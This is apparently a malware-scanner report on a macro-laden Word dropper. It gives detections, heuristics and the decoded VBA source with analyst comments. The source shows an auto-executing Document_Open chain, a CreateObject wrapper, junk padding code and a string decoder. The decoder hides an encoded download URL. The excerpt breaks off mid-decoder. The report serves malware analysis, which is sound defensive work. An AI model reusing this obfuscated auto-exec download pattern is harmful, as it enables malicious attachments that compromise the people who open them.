MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Donoff-5743527-0. Static analysis reveals the presence of VBA macros, specifically a Document_Open macro that utilizes CreateObject and CallByName functions. This indicates the macro is designed to execute code, likely to download and run a second-stage payload, which is a common dropper behavior.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected — medium — 4 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro (auto-executes when the document is opened)
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed here are standard OOXML schema namespace URIs. URL http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 14dab8f4f24531d789bf3cd40aef905c0f39bb35e117d0514123cc9837c70c7f) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17670 bytes |
Preview script — first 1,000 lines of the extracted script
' Module attributes of the document's own code module ("ThisDocument").
' These values are the usual ones for a Word ThisDocument module; they are not a finding by themselves.
' The interesting content of this module is the Document_Open Sub further down.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Neither parameter is read. Every statement calls or assigns a name that appears nowhere else in the
' visible portion of the extracted source, and nothing visible calls this Sub either. This reads like
' junk/padding code (inference — the rest of the source is truncated), not part of the execution chain.
' None of the report's flagged calls (Document_Open, CreateObject, CallByName) occur here.
Private Sub AqGIzOKmku(ByVal YvByVGEUfwYs As String, ByVal QiDmKkBU As Integer)
RAJkxRAO True, "MNg", 9044
nrqgBvsk "DLSsB", ""
ByVbq
WeAlUmwjSz = 6741
If cflKZw("3BI", 886, 440) Then
FAeYprPcpRgS = 9024
CeAcctfZO
qMCjGfmVgV 1883
gsxMraXnbqZ = 3192
kfSTUdthq "VBJG"
dXILydnFmTir = "Uicp"
Else
VoJvXXYEXe 653, 5024, 4694
ZMvPIAJHbku "DQ", 9258
rrRNJUtbK
CAHSphrfj = False
End If
End Sub
' Same pattern as AqGIzOKmku: the parameter is unused, every callee/assignment target is a name that
' does not occur elsewhere in the visible source, and no visible caller exists. Likely junk code
' (inference); skip it when tracing behaviour.
Private Sub iEMevxNXKeiBVU(ByVal TtkUWvPOjl As Integer)
NgoSddEgU "", "VbEL", "7MLBx"
sVglOQFbX = 358
mkQmWSqrEMlr
zWbkNYECj = "LA"
If bYdAMratRzstY(True, 55, True) Then
YDnGiDqipjZAE = 4069
niCDeuQ 555, "", 2131
uaNNpRBQTLHV = "sg"
wSzryoMjmSYPO
Else
EJQyxPZQZscjHA
yoquJznjLWBRYo 9355
aPZDHBxPWc = "gaQ"
End If
End Sub
' Auto-execution entry point: Word runs Document_Open when the document is opened
' (the OLE_VBA_DOCOPEN finding in the report). Both locals are declared and never used.
' The only real statement hands control to the public Sub IeAnzpa in module qnkUkTXLLKw,
' which is where the visible execution chain starts.
Private Sub Document_Open()
Dim MuddGSA As Integer
Dim HkTGL As Boolean
qnkUkTXLLKw.IeAnzpa
End Sub
' Second module. Holds the real chain reached from Document_Open (IeAnzpa -> wGxOdbqz -> HEQKZTe),
' the CreateObject wrapper GkzxQoo, three decoded-string constants, and several apparent junk Subs.
Attribute VB_Name = "qnkUkTXLLKw"
' Apparent junk code: parameters unused, callees not defined anywhere in the visible source,
' no visible caller.
Private Sub wojyUoR(ByVal woICsv As String, ByVal FgdFaveLMVVy As String)
pHhOWgIUTIArYE "lYA"
xlPCeCtDtQmUAk = "IlE"
JyQrCFs "", "qvY", True
End Sub
' Apparent junk code: parameters unused, callees undefined in the visible source, no visible caller.
Private Sub rYlbTvFKg(ByVal GmNrfGZBukgJwv As Integer, ByVal Mtmrrd As String)
YSEoOP 3110
TqqsyPuI = 6371
tINZvihqRnYCBl "RF9qQ", ""
ehXjUuue = True
alLTGqw
End Sub
' Apparent junk code: three bare calls to names undefined in the visible source; parameters unused;
' no visible caller.
Private Sub SOqZeEOfaraC(ByVal HKbmiKoYxFAeJ As String, ByVal BDwJCfiw As Boolean)
CmZsoCjspV
tLCsWWYL
pCQCVJ
End Sub
' CreateObject wrapper (the OLE_VBA_CREATEOBJ finding): instantiates whatever ProgID the caller
' passes in EMUHlfGzpzqClj and returns it via the identity function VnKWVQDwMUQ, which only adds
' an indirection. ZvqRmQ and both locals are unused. No caller is visible in this excerpt, so the
' ProgID cannot be recovered from here — presumably supplied from the truncated part of the source; confirm.
Public Function GkzxQoo(ByVal EMUHlfGzpzqClj As String, ByVal ZvqRmQ As String) As Object
Dim wQcVFxFA As Integer
Dim emryecrSU As String
Set GkzxQoo = VnKWVQDwMUQ(CreateObject(EMUHlfGzpzqClj))
End Function
' Called from Document_Open. "On Error GoTo NqemBDRpWkUZar" points at an empty label, so any runtime
' error in the three calls is swallowed and the Sub exits silently — a failed stage leaves no trace
' for the user. yYLHHCYO.rmNuzMTH and yYLHHCYO.tPccuuhyHWh belong to a module that is not in this
' excerpt (behaviour unknown); wGxOdbqz is defined below and leads to the decoded-string routines.
' Both locals are unused.
Public Sub IeAnzpa()
Dim GeJyhXh As String
Dim zIJkdjyt As Integer
On Error GoTo NqemBDRpWkUZar
yYLHHCYO.rmNuzMTH
yYLHHCYO.tPccuuhyHWh
wGxOdbqz
Exit Sub
NqemBDRpWkUZar:
End Sub
' Apparent junk code: parameter unused, every callee/assignment target is undefined in the visible
' source, no visible caller.
Private Sub sFDsnWNTDKxuw(ByVal EKcEzayYoKj As String)
nuqatJfPl = "DF30A"
If jJsvg Then
DZksN False, "tdVmq"
oRaDszJLr
NwDhdgwwJgu True
Else
cxDckEVa 2123
End If
pRVrImJizyHN "0A", 972
End Sub
' Identity pass-through: returns its Object argument unchanged (the Integer local is never used).
' Its only visible use is to wrap the CreateObject result in GkzxQoo.
Private Function VnKWVQDwMUQ(ByVal eZRkOVn As Object) As Object
Dim CLAjVgeR As Integer
Set VnKWVQDwMUQ = eZRkOVn
End Function
' Core of the visible chain. Every callee (CMmmIEQhRjKTmS, cslCcVNz, PYkIIQvyh) lives in a module
' outside this excerpt, so its behaviour can only be inferred from the arguments:
'   - CWYeXx receives jpedGjO(), whose decoded value looks like an http:// URL;
'   - lMqvVUJEqCr() and BYdaZ() are the other two decoded strings from this module.
' That is consistent with the download-and-run behaviour the report describes, but the actual
' network, file and execution calls are not visible here — confirm from the full source.
' iIzHeiaxpbCgTJ is never read. GgHpvTKZDohLE has no visible Dim (and no Option Explicit is visible),
' so it is presumably an implicit Variant that holds the object returned by TEEexLWgIt.
Private Sub HEQKZTe(ByVal mQSDUIqaxD As String, ByVal iIzHeiaxpbCgTJ As String, ByVal CWYeXx As String)
Set GgHpvTKZDohLE = CMmmIEQhRjKTmS.TEEexLWgIt(True, CWYeXx)
CMmmIEQhRjKTmS.GxbdD lMqvVUJEqCr, 2670, "LQ", GgHpvTKZDohLE
cslCcVNz.fccxvdQ PYkIIQvyh.jeiGVrDDEqx(BYdaZ, GgHpvTKZDohLE, 8879), False, "", mQSDUIqaxD
End Sub
' Called from IeAnzpa. Feeds cslCcVNz.iTXEKA (a member of a module not in this excerpt), the literal
' "jCVl" and the decoded string jpedGjO() into HEQKZTe, then calls cslCcVNz.oQJliWFbrPOx with the
' same iTXEKA value. WEWUl is declared and never used.
Private Sub wGxOdbqz()
Dim WEWUl As Boolean
HEQKZTe cslCcVNz.iTXEKA, "jCVl", jpedGjO
cslCcVNz.oQJliWFbrPOx False, 618, cslCcVNz.iTXEKA
End Sub
' Decoded-string constant. NyuGNIACWILvzX (module nRWwXeQ) is the string decoder; its body is
' truncated in this excerpt, but removing every character of the second argument from the first
' produces readable text at all three call sites in this module — here a "can't download file"
' style error message. Verify against the complete decoder before relying on this reading.
Private Function lMqvVUJEqCr() As String
lMqvVUJEqCr = nRWwXeQ.NyuGNIACWILvzX("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
' Decoded-string constant (same strip-the-key reading as lMqvVUJEqCr): yields a property-name-like
' token of the kind used to read an HTTP response body. Passed to PYkIIQvyh.jeiGVrDDEqx in HEQKZTe.
' Inference from the encoded literal only — confirm with the full decoder.
Private Function BYdaZ() As String
BYdaZ = nRWwXeQ.NyuGNIACWILvzX("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
' Decoded-string constant: with the key characters stripped, the literal reads as an http:// URL.
' This is the network indicator of the sample (not the benign schema URLs in the report's EMBEDDED_URL
' list, which come from the document body). It is not transcribed here; recover it with the full
' decoder in an isolated environment and record it as an IoC. Consumed by wGxOdbqz -> HEQKZTe.
Private Function jpedGjO() As String
jpedGjO = nRWwXeQ.NyuGNIACWILvzX("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
' Third module: string-decoding helpers used by qnkUkTXLLKw. NyuGNIACWILvzX is the public decoder
' (its body is truncated in this excerpt); HKPBzhQwSlfh is its per-character filter.
Attribute VB_Name = "nRWwXeQ"
' Per-character filter used by the decoder NyuGNIACWILvzX (truncated below). Returns AOADjSepJEqEpp
' unchanged when ZXTnxsyUa.xlRcdsFOGNN(...) is False; otherwise the function is never assigned and
' returns the VBA default for a String ("") — i.e. the character is dropped. ZXTnxsyUa is a module
' outside this excerpt; given the decoded results, xlRcdsFOGNN presumably tests whether
' VasbcNkpFwE (the key) contains the character — confirm. The two Integer parameters are unused.
Private Function HKPBzhQwSlfh(ByVal YMRuUXdOIuTOx As Integer, ByVal ryLlErdUlAIqAA As Integer, ByVal VasbcNkpFwE As String, ByVal AOADjSepJEqEpp As String) As String
If Not ZXTnxsyUa.xlRcdsFOGNN(AOADjSepJEqEpp, False, False, VasbcNkpFwE) Then
HKPBzhQwSlfh = AOADjSepJEqEpp
End If
End Function
' Apparent junk code: parameter unused, the two bare calls are undefined in the visible source,
' the return value is the fixed literal "7Hue7", and nothing visible calls it.
Private Function yCDtRB(ByVal kLeZi As String) As String
mmRHE
LmWHpkRmpQX = False
SvYYBFIc
yCDtRB = "7Hue7"
End Function
Public Function NyuGNIACWILvzX(ByVal fUBXNCtjw As String, ByVal tLmcqkIA As String) As String
mzyTYBakx = 4259
For pTgqCQKsQwbVaI = tQvWpYBDwq To ZXTnxsyUa.TLCppSWdloGaUn("reFdg", "Bpg", fUBXNCtjw)
yYQZuhdeq = 8749
NyuGNIACWILvzX = ZXTnxsyUa.eOzdtLHUIC(5793, NyuGNIACWILvzX, HKPBzhQwSlfh(3772, 6608, tLmcqkIA, ZXTnxsyUa.iAEYk(pTgqC
... (truncated)